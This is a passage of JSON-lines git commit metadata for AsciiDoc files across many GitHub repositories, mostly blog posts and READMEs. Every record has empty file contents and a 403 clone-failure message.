icsearch,mcku\/elasticsearch,jbertouch\/elasticsearch,mjhennig\/elasticsearch,lchennup\/elasticsearch,heng4fun\/elasticsearch,dylan8902\/elasticsearch,tsohil\/elasticsearch,mjhennig\/elasticsearch,JackyMai\/elasticsearch,truemped\/elasticsearch,Siddartha07\/elasticsearch,rajanm\/elasticsearch,jaynblue\/elasticsearch,mikemccand\/elasticsearch,hanst\/elasticsearch,lzo\/elasticsearch-1,vroyer\/elasticassandra,nilabhsagar\/elasticsearch,wenpos\/elasticsearch,MaineC\/elasticsearch,qwerty4030\/elasticsearch,sdauletau\/elasticsearch,mmaracic\/elasticsearch,luiseduardohdbackup\/elasticsearch,springning\/elasticsearch,ulkas\/elasticsearch,jimczi\/elasticsearch,nellicus\/elasticsearch,Helen-Zhao\/elasticsearch,Charlesdong\/elasticsearch,slavau\/elasticsearch,markharwood\/elasticsearch,dpursehouse\/elasticsearch,elancom\/elasticsearch,TonyChai24\/ESSource,davidvgalbraith\/elasticsearch,wittyameta\/elasticsearch,kunallimaye\/elasticsearch,awislowski\/elasticsearch,overcome\/elasticsearch,vingupta3\/elasticsearch,socialrank\/elasticsearch,kingaj\/elasticsearch,snikch\/elasticsearch,vingupta3\/elasticsearch,kalimatas\/elasticsearch,Asimov4\/elasticsearch,Fsero\/elasticsearch,wuranbo\/elasticsearch,codebunt\/elasticsearch,socialrank\/elasticsearch,koxa29\/elasticsearch,fred84\/elasticsearch,MichaelLiZhou\/elasticsearch,mm0\/elasticsearch,vrkansagara\/elasticsearch,vvcephei\/elasticsearch,smflorentino\/elasticsearch,jbertouch\/elasticsearch,tkssharma\/elasticsearch,mjason3\/elasticsearch,andrejserafim\/elasticsearch,truemped\/elasticsearch,jango2015\/elasticsearch,hanst\/elasticsearch,jchampion\/elasticsearch,anti-social\/elasticsearch,coding0011\/elasticsearch,infusionsoft\/elasticsearch,andrejserafim\/elasticsearch,thecocce\/elasticsearch,StefanGor\/elasticsearch,strapdata\/elassandra5-rc,smflorentino\/elasticsearch,njlawton\/elasticsearch,amaliujia\/elasticsearch,KimTaehee\/elasticsearch,lks21c\/elasticsearch,Ansh90\/elasticsearch,loconsolutions\/elasticsearch,pablocastro\/elasticsearch,sposam\/elasticsearch,hanswang\/elasticsearch,lightslife\/elasticsearch,jprante\/elasticsearch,slavau\/elasticsearch,xingguang2013\/elasticsearch,humandb\/elasticsearch,alexbrasetvik\/elasticsearch,Uiho\/elasticsearch,kubum\/elasticsearch,Clairebi\/ElasticsearchClone,dpursehouse\/elasticsearch,xingguang2013\/elasticsearch,masterweb121\/elasticsearch,Microsoft\/elasticsearch,jango2015\/elasticsearch,chirilo\/elasticsearch,slavau\/elasticsearch,nilabhsagar\/elasticsearch,AleksKochev\/elasticsearch,Uiho\/elasticsearch,truemped\/elasticsearch,kenshin233\/elasticsearch,yongminxia\/elasticsearch,brandonkearby\/elasticsearch,linglaiyao1314\/elasticsearch,i-am-Nathan\/elasticsearch,spiegela\/elasticsearch,wuranbo\/elasticsearch,fernandozhu\/elasticsearch,ImpressTV\/elasticsearch,kcompher\/elasticsearch,Collaborne\/elasticsearch,btiernay\/elasticsearch,bestwpw\/elasticsearch,dylan8902\/elasticsearch,strapdata\/elassandra5-rc,lydonchandra\/elasticsearch,obourgain\/elasticsearch,linglaiyao1314\/elasticsearch,Charlesdong\/elasticsearch,amit-shar\/elasticsearch,TonyChai24\/ESSource,AshishThakur\/elasticsearch,YosuaMichael\/elasticsearch,AndreKR\/elasticsearch,huanzhong\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,robin13\/elasticsearch,humandb\/elasticsearch,kkirsche\/elasticsearch,vietlq\/elasticsearch,jaynblue\/elasticsearch,nellicus\/elasticsearch,yongminxia\/elasticsearch,jango2015\/elasticsearch,weipinghe\/elasticsearch,karthikjaps\/elasticsearch,gingerwizard\/elasticsearch,sauravmondallive\/elasticsearch,lightslife\/elasticsearch,mm0\/elasticsearch,cnfire\/elasticsearch-1,bawse\/elasticsearch,amaliujia\/elasticsearch,hechunwen\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,KimTaehee\/elasticsearch,achow\/elasticsearch,lydonchandra\/elasticsearch,andrestc\/elasticsearch,nrkkalyan\/elasticsearch,milodky\/elasticsearch,zeroctu\/elasticsearch,IanvsPoplicola\/elasticsearch,mute\/elasticsearch,iamjakob\/elasticsearch,sarwarbhuiyan\/elasticsearch,achow\/elasticsearch,sjohnr\/elasticsearch,i-am-Nathan\/elasticsearch,MetSystem\/elasticsearch,thecocce\/elasticsearch,naveenhooda2000\/elasticsearch,onegambler\/elasticsearch,huypx1292\/elasticsearch,TonyChai24\/ESSource,tahaemin\/elasticsearch,YosuaMichael\/elasticsearch,MichaelLiZhou\/elasticsearch,myelin\/elasticsearch,martinstuga\/elasticsearch,gfyoung\/elasticsearch,Brijeshrpatel9\/elasticsearch,sc0ttkclark\/elasticsearch,TonyChai24\/ESSource","old_file":"docs\/reference\/setup\/configuration.asciidoc","new_file":"docs\/reference\/setup\/configuration.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a3fee2dc95250f7772b41f1132141f4ee666201e","subject":"add doc on gettingTheSource","message":"add doc on gettingTheSource\n","repos":"AdamDWalker\/Graphics-Work,shearer12345\/graphicsByExample","old_file":"doc\/_includes\/gettingTheSource.asciidoc","new_file":"doc\/_includes\/gettingTheSource.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/shearer12345\/graphicsByExample.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"44620dfa982398d753445a9f58557b01f0e0f28e","subject":"Update 2016-05-13-Engineer-Career-Path.adoc","message":"Update 2016-05-13-Engineer-Career-Path.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-05-13-Engineer-Career-Path.adoc","new_file":"_posts\/2016-05-13-Engineer-Career-Path.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2e644d89a5e5affe94de392bf9fefad3f6dd6d06","subject":"Update 2017-05-29-Anaya-Blog-Episode-1.adoc","message":"Update 2017-05-29-Anaya-Blog-Episode-1.adoc","repos":"harvard-visionlab\/harvard-visionlab.github.io,harvard-visionlab\/harvard-visionlab.github.io,harvard-visionlab\/harvard-visionlab.github.io,harvard-visionlab\/harvard-visionlab.github.io","old_file":"_posts\/2017-05-29-Anaya-Blog-Episode-1.adoc","new_file":"_posts\/2017-05-29-Anaya-Blog-Episode-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/harvard-visionlab\/harvard-visionlab.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f3af8ef75b1920cffc226fd2046d94bea1cc0f17","subject":"Update 2016-04-01-S-Q-L-Injection-basic.adoc","message":"Update 2016-04-01-S-Q-L-Injection-basic.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-01-S-Q-L-Injection-basic.adoc","new_file":"_posts\/2016-04-01-S-Q-L-Injection-basic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"931ce069a520aa5bc386cb9f135d6c506ca1888f","subject":"Update 2017-07-20-Typescript-Conversion.adoc","message":"Update 2017-07-20-Typescript-Conversion.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2017-07-20-Typescript-Conversion.adoc","new_file":"_posts\/2017-07-20-Typescript-Conversion.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ee4a3c206c0f6ee6bea8179881884225e9a53b7e","subject":"Update 2017-09-30-Matrix-Layer-Rotation.adoc","message":"Update 2017-09-30-Matrix-Layer-Rotation.adoc","repos":"JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io","old_file":"_posts\/2017-09-30-Matrix-Layer-Rotation.adoc","new_file":"_posts\/2017-09-30-Matrix-Layer-Rotation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/JithinPavithran\/JithinPavithran.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e5570dbcbe4a12a7bc3fc43bafb8ad539a8cc13c","subject":"Deleted _posts\/2016-7-8.adoc","message":"Deleted _posts\/2016-7-8.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-7-8.adoc","new_file":"_posts\/2016-7-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3be12957ade513e2ebd1334a1ed6130b91519fdd","subject":"y2b create post The Secret Bolt","message":"y2b create post The Secret Bolt","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-03-31-The-Secret-Bolt.adoc","new_file":"_posts\/2015-03-31-The-Secret-Bolt.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"65555fdd8515c615bdd2bf7840f68e4d656fc2e3","subject":"Update 2016-10-14-Try-Line-Notify.adoc","message":"Update 2016-10-14-Try-Line-Notify.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-10-14-Try-Line-Notify.adoc","new_file":"_posts\/2016-10-14-Try-Line-Notify.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"14262324c04852b78fa48a715fc28071f33fe2af","subject":"Update 2018-05-20-Your-Blog-title.adoc","message":"Update 2018-05-20-Your-Blog-title.adoc","repos":"ditirambo\/ditirambo.es,ditirambo\/ditirambo.es,ditirambo\/ditirambo.es,ditirambo\/ditirambo.es","old_file":"_posts\/2018-05-20-Your-Blog-title.adoc","new_file":"_posts\/2018-05-20-Your-Blog-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ditirambo\/ditirambo.es.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"93b980bbf6100bad953ff638fac9801ee25efd74","subject":"Wording","message":"Wording\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Best practices\/TestingEE.adoc","new_file":"Best practices\/TestingEE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8f69ffaac52f429198605d7e84c092ff442c98be","subject":"Update 2016-10-06-Blockchain-for-healthcare-industry.adoc","message":"Update 2016-10-06-Blockchain-for-healthcare-industry.adoc","repos":"pramodjg\/articles,pramodjg\/articles,pramodjg\/articles,pramodjg\/articles","old_file":"_posts\/2016-10-06-Blockchain-for-healthcare-industry.adoc","new_file":"_posts\/2016-10-06-Blockchain-for-healthcare-industry.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pramodjg\/articles.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b79429fdaaccc7844675f69390e1278e01d290c7","subject":"chore: Added CLA part on the contributing doc","message":"chore: Added CLA part on the contributing doc\n","repos":"gravitee-io\/gravitee.io,gravitee-io\/gravitee.io,gravitee-io\/gravitee.io","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"55103053be4ff346a980361153e5109076237b9d","subject":"Update 2015-08-24-Simple-post.adoc","message":"Update 2015-08-24-Simple-post.adoc","repos":"pascalgrimaud\/hubpress.io,pascalgrimaud\/hubpress.io,pascalgrimaud\/hubpress.io","old_file":"_posts\/2015-08-24-Simple-post.adoc","new_file":"_posts\/2015-08-24-Simple-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pascalgrimaud\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"45c82aca95ca91f55d7bd90db59c0c833bf94db0","subject":"Renamed '_posts\/2019-01-31-Cyber-Exile.adoc' to '_posts\/2017-10-27-Cyber-Exile.adoc'","message":"Renamed '_posts\/2019-01-31-Cyber-Exile.adoc' to '_posts\/2017-10-27-Cyber-Exile.adoc'","repos":"netrunnerX\/netrunnerx.github.io,netrunnerX\/netrunnerx.github.io,netrunnerX\/netrunnerx.github.io,netrunnerX\/netrunnerx.github.io","old_file":"_posts\/2017-10-27-Cyber-Exile.adoc","new_file":"_posts\/2017-10-27-Cyber-Exile.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/netrunnerX\/netrunnerx.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8750c1ac8e5b3175830f910899f449142c6225fc","subject":"Dropping into debug","message":"Dropping into debug\n","repos":"cmpitg\/programming-language-notes","old_file":"Python.adoc","new_file":"Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"03b89a038b55ca5ad7de6cfd7ce99f5d7e1fb3f5","subject":"Add README stub","message":"Add README stub\n","repos":"dexX7\/java-libbitcoinconsensus,dexX7\/java-libbitcoinconsensus,JornC\/java-libbitcoinconsensus","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/JornC\/java-libbitcoinconsensus.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9022568e588b168ad01b4c5db337be4fbd2b8a0a","subject":"[#14] Add build automation badges (#15)","message":"[#14] Add build automation badges (#15)\n\nCloses #14","repos":"Gman98ish\/byteslice","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Gman98ish\/byteslice.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5c543f73c9b472b6fa27f14c82b2ece60630e1be","subject":"Create README.adoc","message":"Create README.adoc","repos":"teacurran\/personal-api,teacurran\/personal-api,teacurran\/personal-api","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/teacurran\/personal-api.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"99294de7c9ad43c3fde2060fb42b819827bcee06","subject":"Add readme","message":"Add readme\n","repos":"guigolab\/bamstats,guigolab\/bamstats","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/guigolab\/bamstats.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"fde457d4d8aaf6d08f7c845d7e65f47be0290bc2","subject":"COMPILING: Unofficial DeuTex has a new unofficial home!","message":"COMPILING: Unofficial DeuTex has a new unofficial home!\n","repos":"CWolfRU\/freedoom,CWolfRU\/freedoom","old_file":"COMPILING.adoc","new_file":"COMPILING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/CWolfRU\/freedoom.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"bfbbbc9a793940d85aeb93952c96d4ce4b705b71","subject":"Update 2015-08-18-test-2.adoc","message":"Update 2015-08-18-test-2.adoc","repos":"jiashengc\/blog,jiashengc\/blog,jiashengc\/blog","old_file":"_posts\/2015-08-18-test-2.adoc","new_file":"_posts\/2015-08-18-test-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jiashengc\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"06aab90b3d3c7e338216f84fb2c05f6faff65baf","subject":"Update 2016-02-04-Hallo-from-Tekk.adoc","message":"Update 2016-02-04-Hallo-from-Tekk.adoc","repos":"Mentaxification\/Mentaxification.github.io,Mentaxification\/Mentaxification.github.io,Mentaxification\/Mentaxification.github.io","old_file":"_posts\/2016-02-04-Hallo-from-Tekk.adoc","new_file":"_posts\/2016-02-04-Hallo-from-Tekk.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Mentaxification\/Mentaxification.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"223c74011b0389ecfc7d88197c857b737e1b418f","subject":"Update 2019-01-25-Nuxt-Typescript.adoc","message":"Update 2019-01-25-Nuxt-Typescript.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-01-25-Nuxt-Typescript.adoc","new_file":"_posts\/2019-01-25-Nuxt-Typescript.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c523ccbbf87dbdeabdfea96fb8a8e07dc8892adc","subject":"Update 2015-12-19-titre-1.adoc","message":"Update 2015-12-19-titre-1.adoc","repos":"chbailly\/chbailly.github.io,chbailly\/chbailly.github.io,chbailly\/chbailly.github.io,chbailly\/chbailly.github.io","old_file":"_posts\/2015-12-19-titre-1.adoc","new_file":"_posts\/2015-12-19-titre-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chbailly\/chbailly.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8409e9d22dd81fd4b41dda2eb803c1b5b42e96f8","subject":"release notes: add KUDU-2190 and KUDU-2173 for 1.6.0","message":"release notes: add KUDU-2190 and KUDU-2173 for 1.6.0\n\nChange-Id: Ib5b01a77b07073f529f31e5a9fb06af9afa113be\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/8703\nTested-by: Kudu Jenkins\nReviewed-by: Mike Percy <e07a1fd797b473a9c849e618aa2ce06d8055760b@apache.org>\n","repos":"helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu","old_file":"docs\/release_notes.adoc","new_file":"docs\/release_notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7d9c3ecef3d97bbc6ce09878a6ea65efae95cb9b","subject":"Update 2016-01-29-Puzzle-3-Hack-Me-Baby.adoc","message":"Update 2016-01-29-Puzzle-3-Hack-Me-Baby.adoc","repos":"puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io","old_file":"_posts\/2016-01-29-Puzzle-3-Hack-Me-Baby.adoc","new_file":"_posts\/2016-01-29-Puzzle-3-Hack-Me-Baby.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puzzles-engineer\/puzzles-engineer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e467a58fb8c0fb0b7b0a67af7a322a3b47326679","subject":"y2b create post PS4 Pro - Does It Suck?","message":"y2b create post PS4 Pro - Does It Suck?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-11-11-PS4-Pro--Does-It-Suck.adoc","new_file":"_posts\/2016-11-11-PS4-Pro--Does-It-Suck.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"26df15fa5a53cbbb96aa444ebb138bf15a9bec4b","subject":"Update 2017-09-30-Matrix-Layer-Rotation.adoc","message":"Update 2017-09-30-Matrix-Layer-Rotation.adoc","repos":"JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io","old_file":"_posts\/2017-09-30-Matrix-Layer-Rotation.adoc","new_file":"_posts\/2017-09-30-Matrix-Layer-Rotation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/JithinPavithran\/JithinPavithran.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3d81a901d34b02d027f5dfcc1ba780950f49bb61","subject":"Update 2016-12-09-Azure-Machine-Learning.adoc","message":"Update 2016-12-09-Azure-Machine-Learning.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-09-Azure-Machine-Learning.adoc","new_file":"_posts\/2016-12-09-Azure-Machine-Learning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ac00d5748fe930a52ada182789f0a290484394cc","subject":"Update 2016-12-02-exhibition-booth-tour.adoc","message":"Update 2016-12-02-exhibition-booth-tour.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-02-exhibition-booth-tour.adoc","new_file":"_posts\/2016-12-02-exhibition-booth-tour.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a8e2483e74685e902391a4999ed1a1e4fd769488","subject":"Update 2016-12-02-exhibition-booth-tour.adoc","message":"Update 2016-12-02-exhibition-booth-tour.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-02-exhibition-booth-tour.adoc","new_file":"_posts\/2016-12-02-exhibition-booth-tour.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"02ee796317837134bea4a1904cc4fefe378d6a24","subject":"Update 2016-6-26-PHPER-H5-base64-base64.adoc","message":"Update 2016-6-26-PHPER-H5-base64-base64.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-6-26-PHPER-H5-base64-base64.adoc","new_file":"_posts\/2016-6-26-PHPER-H5-base64-base64.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ef00d2ec284281863c1a528081a0cc160ec09a32","subject":"Update 2017-05-01-navegacao-com-tabview.adoc","message":"Update 2017-05-01-navegacao-com-tabview.adoc","repos":"NativeScriptBrasil\/nativescriptbrasil.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io","old_file":"_posts\/2017-05-01-navegacao-com-tabview.adoc","new_file":"_posts\/2017-05-01-navegacao-com-tabview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/NativeScriptBrasil\/nativescriptbrasil.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"69acbe8a5fd1c9eda0d6d577eefc00b889a86c1c","subject":"Update 2019-05-17-Logging-configuration.adoc","message":"Update 2019-05-17-Logging-configuration.adoc","repos":"gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io","old_file":"_posts\/2019-05-17-Logging-configuration.adoc","new_file":"_posts\/2019-05-17-Logging-configuration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gquintana\/gquintana.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d02f03dca258184ef77b0c9a3931154afbe0d079","subject":"Update 2016-04-16-B-L-A-N-K-04.adoc","message":"Update 2016-04-16-B-L-A-N-K-04.adoc","repos":"pyxozjhi\/pyxozjhi.github.io,pyxozjhi\/pyxozjhi.github.io,pyxozjhi\/pyxozjhi.github.io,pyxozjhi\/pyxozjhi.github.io","old_file":"_posts\/2016-04-16-B-L-A-N-K-04.adoc","new_file":"_posts\/2016-04-16-B-L-A-N-K-04.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pyxozjhi\/pyxozjhi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cb861d8da23f540ba21b2686fccd22718484dc70","subject":"Update 2017-07-15-Number-letter-count-Projeto-Euler-2.adoc","message":"Update 2017-07-15-Number-letter-count-Projeto-Euler-2.adoc","repos":"minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io","old_file":"_posts\/2017-07-15-Number-letter-count-Projeto-Euler-2.adoc","new_file":"_posts\/2017-07-15-Number-letter-count-Projeto-Euler-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/minicz\/minicz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"783cc0f26e2bcb79c2f011e11d4dd82d4d4d87aa","subject":"Update 2017-10-27-Nginxngx-small-lightminio-S3-Docker.adoc","message":"Update 2017-10-27-Nginxngx-small-lightminio-S3-Docker.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-27-Nginxngx-small-lightminio-S3-Docker.adoc","new_file":"_posts\/2017-10-27-Nginxngx-small-lightminio-S3-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 